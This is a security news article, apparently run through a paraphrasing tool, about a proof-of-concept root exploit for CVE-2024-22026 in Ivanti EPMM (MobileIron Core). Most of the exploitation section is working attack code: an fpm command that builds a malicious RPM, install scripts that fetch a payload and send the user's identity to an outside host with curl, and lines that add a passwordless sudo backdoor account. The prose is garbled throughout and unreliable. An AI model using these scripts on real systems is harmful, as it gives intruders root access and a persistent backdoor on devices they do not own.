PoC Exploit Released for Ivanti EPMM MobileIron Core

by Esmeralda McKenzie
PoC Exploit Released for Ivanti EPMM MobileIron Core

PoC Exploit Released for Ivanti EPMM MobileIron Core

PoC Exploit Released for Ivanti EPMM MobileIron Core

A newly disclosed vulnerability, CVE-2024-22026, has been demonstrate in Ivanti Endpoint Supervisor Cell (EPMM), formerly MobileIron Core.

This vulnerability permits a local attacker to contain root rating entry to to affected programs.

The severity of this vulnerability is at demonstrate undetermined.

CVE-2024-22026: Local Privilege Escalation Vulnerability

The assault vector for CVE-2024-22026 is local, which scheme the attacker need to personal local rating entry to to the system to take good thing concerning the vulnerability, as per reports by Github.

Once exploited, the attacker can rating root rating entry to, which offers plump keep an eye on over the system and could doubtlessly lead to major safety breaches.

Discovery

The machine makes use of the next portray as a low-privilege person to rating and set up RPM packages:

install rpm url 

This portray is a CLI wrapper for the next to happen, which runs as root:

/bin/rpm -Uvh *.rpm

It’s conceivable to bustle any RPM bundle for the reason that RPM portray itself doesn’t examine signatures or block URLs. An attacker can make a false RPM bundle and ship it to the machine, making it inclined.

Exploitation PoCCreating the Malicious RPM

The next portray is extinct to make a malicious RPM bundle:

fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

Preinstall Script (preinstall.sh)

#!/bin/sh  curl -O http:///poc  exit 0  Postinstall Script (postinstall.sh)  #!/bin/sh  set -e  # Enable strict error checking  # Report back current user and privilege level  CURRENT_USER=$(whoami | base64)  PRIV_LEVEL=$(id -u | base64)  curl http:///poc?user=$CURRENT_USER  curl http:///poc?priv=$PRIV_LEVEL  # Create a new root user  if ! useradd -s /bin/sh -m exploit-poc; then    echo "Failed to add user 'exploit-poc'" >&2    exit 1  fi  echo "exploit-poc:" | chpasswd   # Grant root privileges  if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then    echo "Failed to modify sudoers file" >&2    exit 1  fi  exit 0 

Running the CLI Whine to Procure the RPM: To plot shut just correct thing concerning the flaw, the attacker would use the code below in the CLI to rating the malicious RPM and set up it:

install rpm url http:///ivanti-privesc-13.37-1.i386.rpm

Ivanti has released patches to address this vulnerability in variations 12.1.0.0, 12.0.0.0, and 11.12.0.1.

It’s suggested that users substitute these variations to mitigate the threat related to CVE-2024-22026.

Source credit : cybersecuritynews.com

Related Posts